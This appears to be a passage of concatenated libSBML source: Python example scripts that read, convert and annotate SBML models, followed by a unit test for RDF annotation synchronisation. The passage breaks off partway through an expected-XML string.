output This cooks the final output of our swigdoc.py + SWIG sequence for use with doxygen, to do additional transformations that can't be done in swigdoc.py because they rely on having in hand the final output from SWIG. This only acts on files whose names end in .cs. """ if len(args) != 2: print main.__doc__ sys.exit(1) istream = open(args[1], 'r') # Only process the content if it's C#. if re.search('.cs$', args[1]): filterForDoxygen(istream, sys.stdout) else: sys.stdout.write(istream.read()) istream.close() sys.exit(0) if __name__ == '__main__': main(sys.argv) ``` #### File: examples/python/addingEvidenceCodes_1.py ```python import sys import os.path from libsbml import * def main (args): """usage: addingEvidenceCodes_1 <input-filename> <output-filename> Adds controlled vocabulary term to a reaction """ if len(args) != 3: print(main.__doc__) sys.exit(2) d = readSBML(args[1]); errors = d.getNumErrors(); if (errors > 0): print("Read Error(s):\n"); d.printErrors(); print("Correct the above and re-run.\n"); else: n = d.getModel().getNumReactions(); if (n <= 0): print("Model has no reactions.\n Cannot add CV terms\n"); else: r = d.getModel().getReaction(0); # check that the reaction has a metaid # no CVTerms will be added if there is no metaid to reference # if ( not r.isSetMetaId()): r.setMetaId("metaid_0000052"); cv1 = CVTerm(BIOLOGICAL_QUALIFIER); cv1.setBiologicalQualifierType(BQB_IS_DESCRIBED_BY); cv1.addResource("urn:miriam:obo.eco:ECO%3A0000183"); r.addCVTerm(cv1); cv2 = CVTerm(BIOLOGICAL_QUALIFIER); cv2.setBiologicalQualifierType(BQB_IS); cv2.addResource("urn:miriam:kegg.reaction:R00756"); cv2.addResource("urn:miriam:reactome:REACT_736"); r.addCVTerm(cv2); writeSBML(d, args[2]); return errors; if __name__ == '__main__': main(sys.argv) ``` #### File: examples/python/addingEvidenceCodes_2.py ```python import sys import os.path from libsbml import * def main (args): """usage: addingEvidenceCodes_2 <input-filename> <output-filename> Adds controlled vocabulary term to a species """ if len(args) != 3: print(main.__doc__) sys.exit(2) d = readSBML(args[1]); errors = d.getNumErrors(); if (errors > 0): print("Read Error(s):\n"); d.printErrors(); print("Correct the above and re-run.\n"); else: n = d.getModel().getNumSpecies(); if (n <= 0): print("Model has no species.\n Cannot add CV terms\n"); else: s = d.getModel().getSpecies(0); # check that the species has a metaid # no CVTerms will be added if there is no metaid to reference # if (not s.isSetMetaId()): s.setMetaId("metaid_0000052"); cv1 = CVTerm(BIOLOGICAL_QUALIFIER); cv1.setBiologicalQualifierType(BQB_OCCURS_IN); cv1.addResource("urn:miriam:obo.go:GO%3A0005764"); s.addCVTerm(cv1); # now create the additional annotation # <rdf:Statement> # <rdf:subject rdf:resource="#metaid_0000052"/> # <rdf:predicate rdf:resource="http://biomodels.net/biology-qualifiers/occursIn"/> # <rdf:object rdf:resource="urn:miriam:obo.go:GO%3A0005764"/> # <bqbiol:isDescribedBy> # <rdf:Bag> # <rdf:li rdf:resource="urn:miriam:obo.eco:ECO%3A0000004"/> # <rdf:li rdf:resource="urn:miriam:pubmed:7017716"/> # </rdf:Bag> # </bqbiol:isDescribedBy> # </rdf:Statement> # attributes blank_att = XMLAttributes(); resource_att = XMLAttributes(); # create the outer statement node statement_triple = XMLTriple("Statement", "http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdf"); statement_token = XMLToken(statement_triple, blank_att); statement = XMLNode(statement_token); # create the subject node subject_triple = XMLTriple("subject", "http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdf"); resource_att.clear(); resource_att.add("rdf:resource", "#" + s.getMetaId()); subject_token = XMLToken(subject_triple, resource_att); subject = XMLNode(subject_token); #create the predicate node predicate_triple = XMLTriple("predicate", "http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdf"); resource_att.clear(); resource_att.add("rdf:resource", "http://biomodels.net/biology-qualifiers/occursIn"); predicate_token = XMLToken(predicate_triple, resource_att); predicate = XMLNode(predicate_token); #create the object node object_triple = XMLTriple("object", "http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdf"); resource_att.clear(); resource_att.add("rdf:resource", "urn:miriam:obo.go:GO%3A0005764"); object_token = XMLToken(object_triple, resource_att); object_ = XMLNode(object_token); # create the bqbiol node bqbiol_triple = XMLTriple("isDescribedBy", "http://biomodels.net/biology-qualifiers/", "bqbiol"); bqbiol_token = XMLToken(bqbiol_triple, blank_att); bqbiol = XMLNode(bqbiol_token); # create the bag node bag_triple = XMLTriple("Bag", "http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdf"); bag_token = XMLToken(bag_triple, blank_att); bag = XMLNode(bag_token); # create each li node and add to the bag li_triple = XMLTriple("li", "http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdf"); resource_att.clear(); resource_att.add("rdf:resource", "urn:miriam:obo.eco:ECO%3A0000004"); li_token = XMLToken(li_triple, resource_att); li_token.setEnd(); li = XMLNode(li_token); bag.addChild(li); resource_att.clear(); resource_att.add("rdf:resource", "urn:miriam:pubmed:7017716"); li_token = XMLToken(li_triple, resource_att); li_token.setEnd(); li = XMLNode(li_token); bag.addChild(li); # add the bag to bqbiol bqbiol.addChild(bag); # add subject, predicate, object and bqbiol to statement statement.addChild(subject); statement.addChild(predicate); statement.addChild(object_); statement.addChild(bqbiol); # create a top-level RDF element # this will ensure correct merging # xmlns = XMLNamespaces(); xmlns.add("http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdf"); xmlns.add("http://purl.org/dc/elements/1.1/", "dc"); xmlns.add("http://purl.org/dc/terms/", "dcterms"); xmlns.add("http://www.w3.org/2001/vcard-rdf/3.0#", "vCard"); xmlns.add("http://biomodels.net/biology-qualifiers/", "bqbiol"); xmlns.add("http://biomodels.net/model-qualifiers/", "bqmodel"); RDF_triple = XMLTriple("RDF", "http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdf"); RDF_token = XMLToken(RDF_triple, blank_att, xmlns); annotation = XMLNode(RDF_token); # add the staement node to the RDF node annotation.addChild(statement); s.appendAnnotation(annotation); writeSBML(d, args[2]); return errors; if __name__ == '__main__': main(sys.argv) ``` #### File: python/comp/flattenModel.py ```python import sys import os.path import libsbml def main (args): """usage: flattenModel.py [-p] input-filename output-filename -p : list unused ports """ if len(args) != 4 and len(args) != 3 : print(main.__doc__) sys.exit(1) leavePorts = False if len(args) == 3: infile = args[1] outfile = args[2] elif len(args) == 4: if args[1] != "-p": print(main.__doc__) sys.exit(1) else: leavePorts = True infile = args[2] outfile = args[3] if not os.path.exists(infile): print("[Error] %s : No such file." % (infile)) sys.exit(1) reader = libsbml.SBMLReader() writer = libsbml.SBMLWriter() sbmldoc = reader.readSBML(infile) if sbmldoc.getNumErrors() > 0: if sbmldoc.getError(0).getErrorId() == libsbml.XMLFileUnreadable: # Handle case of unreadable file here. sbmldoc.printErrors() elif sbmldoc.getError(0).getErrorId() == libsbml.XMLFileOperationError: # Handle case of other file error here. sbmldoc.printErrors() else: # Handle other error cases here. sbmldoc.printErrors() sys.exit(1) # Create the converter options props = libsbml.ConversionProperties() props.addOption("flatten comp", True, "flatten comp") props.addOption("leavePorts", leavePorts, "unused ports should be listed in the flattened model") # do conversion result = sbmldoc.convert(props) if (result != libsbml.LIBSBML_OPERATION_SUCCESS): sbmldoc.printErrors() print("[Error] Conversion failed... ("+ str(result) + ")") sys.exit(1) writer.writeSBML(sbmldoc, outfile) print("Flat model written to %s" % (outfile)) if __name__ == '__main__': main(sys.argv) ``` #### File: examples/python/promoteParameters.py ```python import sys import os.path import libsbml def main (args): """usage: promoteParameters.py input-filename output-filename """ if len(args) != 3: print(main.__doc__) sys.exit(1) infile = args[1] outfile = args[2] if not os.path.exists(infile): print("[Error] %s : No such file." % (infile)) sys.exit(1) reader = libsbml.SBMLReader() writer = libsbml.SBMLWriter() sbmldoc = reader.readSBML(infile) if sbmldoc.getNumErrors() > 0: if sbmldoc.getError(0).getErrorId() == libsbml.XMLFileUnreadable: # Handle case of unreadable file here. sbmldoc.printErrors() elif sbmldoc.getError(0).getErrorId() == libsbml.XMLFileOperationError: # Handle case of other file error here. sbmldoc.printErrors() else: # Handle other error cases here. sbmldoc.printErrors() sys.exit(1) props = libsbml.ConversionProperties() props.addOption("promoteLocalParameters", True, "Promotes all Local Parameters to Global ones") if (sbmldoc.convert(props) != libsbml.LIBSBML_OPERATION_SUCCESS): print("[Error] Conversion failed...") sys.exit(1) writer.writeSBML(sbmldoc, outfile) print("[OK] wrote %s" % (package, infile, outfile)) if __name__ == '__main__': main(sys.argv) ``` #### File: examples/python/readSBML.py ```python import sys import time import os import os.path from libsbml import * def main (args): """Usage: readSBML filename """ if (len(args) != 2): print("Usage: readSBML filename"); return 1; filename = args[1]; current = time.clock(); document = readSBML(filename); errors = document.getNumErrors(); print; print(" filename: " + filename); print(" file size: " + str(os.stat(filename).st_size)); print(" read time (ms): " + str(time.clock() - current)); print(" validation error(s): " + str(errors)); print; document.printErrors(); return errors; if __name__ == '__main__': main(sys.argv) ``` #### File: examples/python/stripPackage.py ```python import sys import os.path import libsbml def main (args): """usage: stripPackage.py input-filename package-to-strip output-filename """ if len(args) != 4: print(main.__doc__) sys.exit(1) infile = args[1] package = args[2] outfile = args[3] if not os.path.exists(infile): print("[Error] %s : No such file." % (infile)) sys.exit(1) reader = libsbml.SBMLReader() writer = libsbml.SBMLWriter() sbmldoc = reader.readSBML(infile) if sbmldoc.getNumErrors() > 0: if sbmldoc.getError(0).getErrorId() == libsbml.XMLFileUnreadable: # Handle case of unreadable file here. sbmldoc.printErrors() elif sbmldoc.getError(0).getErrorId() == libsbml.XMLFileOperationError: # Handle case of other file error here. sbmldoc.printErrors() else: # Handle other error cases here. sbmldoc.printErrors() sys.exit(1) props = libsbml.ConversionProperties() props.addOption("stripPackage", True, "Strip SBML Level 3 package constructs from the model") props.addOption("package", package, "Name of the SBML Level 3 package to be stripped") if (sbmldoc.convert(props) != libsbml.LIBSBML_OPERATION_SUCCESS): print("[Error] Conversion failed...") sys.exit(1) writer.writeSBML(sbmldoc, outfile) print("[OK] stripped package '%s' from %s to %s" % (package, infile, outfile)) if __name__ == '__main__': main(sys.argv) ``` #### File: examples/python/unsetNotes.py ```python import sys import time import os import os.path from libsbml import * def main (args): """Usage: unsetNotes <input-filename> <output-filename> """ if (len(args) != 3): print("\n" + "Usage: unsetNotes <input-filename> <output-filename>" + "\n" + "\n"); return 1; filename = args[1]; document = readSBML(filename); errors = document.getNumErrors(); if (errors > 0): document.printErrors(); return errors; m = document.getModel(); m.unsetNotes(); for i in range(0, m.getNumReactions()): re = m.getReaction(i); re.unsetNotes(); for j in range(0, re.getNumReactants()): rt = re.getReactant(j); rt.unsetNotes(); for j in range(0, re.getNumProducts()): rt = re.getProduct(j); rt.unsetNotes(); for j in range(0, re.getNumModifiers()): md = re.getModifier(j); md.unsetNotes(); if (re.isSetKineticLaw()): kl = re.getKineticLaw(); kl.unsetNotes(); for j in range(0, kl.getNumParameters()): pa = kl.getParameter(j); pa.unsetNotes(); for i in range(0, m.getNumSpecies()): sp = m.getSpecies(i); sp.unsetNotes(); for i in range(0, m.getNumCompartments()): sp = m.getCompartment(i); sp.unsetNotes(); for i in range(0, m.getNumFunctionDefinitions()): sp = m.getFunctionDefinition(i); sp.unsetNotes(); for i in range(0, m.getNumUnitDefinitions()): sp = m.getUnitDefinition(i); sp.unsetNotes(); for i in range(0, m.getNumParameters()): sp = m.getParameter(i); sp.unsetNotes(); for i in range(0, m.getNumRules()): sp = m.getRule(i); sp.unsetNotes(); for i in range(0, m.getNumInitialAssignments()): sp = m.getInitialAssignment(i); sp.unsetNotes(); for i in range(0, m.getNumEvents()): sp = m.getEvent(i); sp.unsetNotes(); for j in range(0, sp.getNumEventAssignments()): ea = sp.getEventAssignment(j); ea.unsetNotes(); for i in range(0, m.getNumSpeciesTypes()): sp = m.getSpeciesType(i); sp.unsetNotes(); for i in range(0, m.getNumConstraints()): sp = m.getConstraint(i); sp.unsetNotes(); writeSBML(document, args[2]); return errors; if __name__ == '__main__': main(sys.argv) ``` #### File: test/annotation/TestSyncAnnotation.py ```python import sys import unittest import libsbml def wrapString(s): return s pass class TestSyncAnnotation(unittest.TestCase): global d d = None global m m = None def equals(self, *x): if len(x) == 2: return x[0] == x[1] elif len(x) == 1: return x[0] == self.OSS.str() def setUp(self): filename = "../../sbml/annotation/test/test-data/annotationL3_2.xml" self.d = libsbml.readSBML(filename) self.m = self.d.getModel() pass def tearDown(self): self.d = None pass def test_SyncAnnotation_deleteCVTerms(self): c = self.m.getCompartment(1) xml = libsbml.RDFAnnotationParser.deleteRDFCVTermAnnotation(c.getAnnotation()) expected = wrapString("<annotation>\n" + " <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n" + " <jd2:header>\n" + " <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n" + " <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n" + " <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n" + " </jd2:header>\n" + " </jd2:JDesignerLayout>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG>\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " </rdf:Description>\n" + " <rdf:Description>\n" + " <rdf:other/>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") self.assertEqual( True, self.equals(expected,xml.toXMLString()) ) pass def test_SyncAnnotation_deleteModelOnly(self): c = self.m.getCompartment(1) xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(c.getAnnotation()) expected = wrapString("<annotation>\n" + " <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n" + " <jd2:header>\n" + " <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n" + " <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n" + " <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n" + " </jd2:header>\n" + " </jd2:JDesignerLayout>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " <rdf:Description>\n" + " <rdf:other/>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") self.assertEqual( True, self.equals(expected,xml.toXMLString()) ) pass def test_SyncAnnotation_deleteModelOnly_1(self): c = self.m.getCompartment(7) xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(c.getAnnotation()) expected = wrapString("<annotation>\n" + " <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n" + " <jd2:header>\n" + " <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n" + " <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n" + " <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n" + " </jd2:header>\n" + " </jd2:JDesignerLayout>\n" + "</annotation>") self.assertEqual( True, self.equals(expected,xml.toXMLString()) ) xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(None) self.assert_( xml == None ) xml = libsbml.RDFAnnotationParser.deleteRDFHistoryAnnotation(libsbml.XMLNode.convertStringToXMLNode("<notannotatio/>")) self.assert_( xml == None ) pass def test_SyncAnnotation_modifyBoth_1(self): c = self.m.getCompartment(0) mh = self.m.getModelHistory().clone() cv = self.m.getCVTerm(0).clone() c.setModelHistory(mh) c.addCVTerm(cv) c.unsetCVTerms() expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000002\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family><NAME></vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) c.unsetModelHistory() c.addCVTerm(cv) expected1 = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000002\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected1,c.toSBML()) ) c.setModelHistory(mh) c.unsetCVTerms() c.addCVTerm(cv) expected2 = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000002\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family><NAME></vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected2,c.toSBML()) ) pass def test_SyncAnnotation_modifyBoth_2(self): c = self.m.getCompartment(0) mh = self.m.getModelHistory().clone() cv = self.m.getCVTerm(0).clone() c.setModelHistory(mh) c.unsetModelHistory() c.addCVTerm(cv) expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000002\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_modifyBoth_3(self): c = self.m.getCompartment(0) mh = self.m.getModelHistory().clone() cv = self.m.getCVTerm(0).clone() c.setModelHistory(mh) c.addCVTerm(cv) expected = wrapString("<compartment metaid=\"_000002\" id=\"comp1\" constant=\"true\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000002\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_modifyBoth_4(self): c = self.m.getCompartment(1) mh = c.getModelHistory().clone() cv = c.getCVTerm(0).clone() c.unsetModelHistory() c.unsetCVTerms() expected = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n" + " <annotation>\n" + " <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n" + " <jd2:header>\n" + " <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n" + " <jd2:ModelHeader Author=\"<NAME>\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n" + " <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n" + " </jd2:header>\n" + " </jd2:JDesignerLayout>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description>\n" + " <rdf:other/>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) c.setModelHistory(mh) c.addCVTerm(cv) c.unsetCVTerms() expected1 = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n" + " <annotation>\n" + " <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n" + " <jd2:header>\n" + " <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n" + " <jd2:ModelHeader Author=\"Mr Untitled\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n" + " <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n" + " </jd2:header>\n" + " </jd2:JDesignerLayout>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " </rdf:Description>\n" + " <rdf:Description>\n" + " <rdf:other/>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected1,c.toSBML()) ) c.unsetModelHistory() c.unsetCVTerms() c.addCVTerm(cv) expected2 = wrapString("<compartment metaid=\"_000003\" id=\"A\" constant=\"true\">\n" + " <annotation>\n" + " <jd2:JDesignerLayout version=\"2.0\" MajorVersion=\"2\" MinorVersion=\"0\" BuildVersion=\"41\">\n" + " <jd2:header>\n" + " <jd2:VersionHeader JDesignerVersion=\"2.0\"/>\n" + " <jd2:ModelHeader Author=\"Mr Untitled\" ModelVersion=\"0.0\" ModelTitle=\"untitled\"/>\n" + " <jd2:TimeCourseDetails timeStart=\"0\" timeEnd=\"10\" numberOfPoints=\"1000\"/>\n" + " </jd2:header>\n" + " </jd2:JDesignerLayout>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" 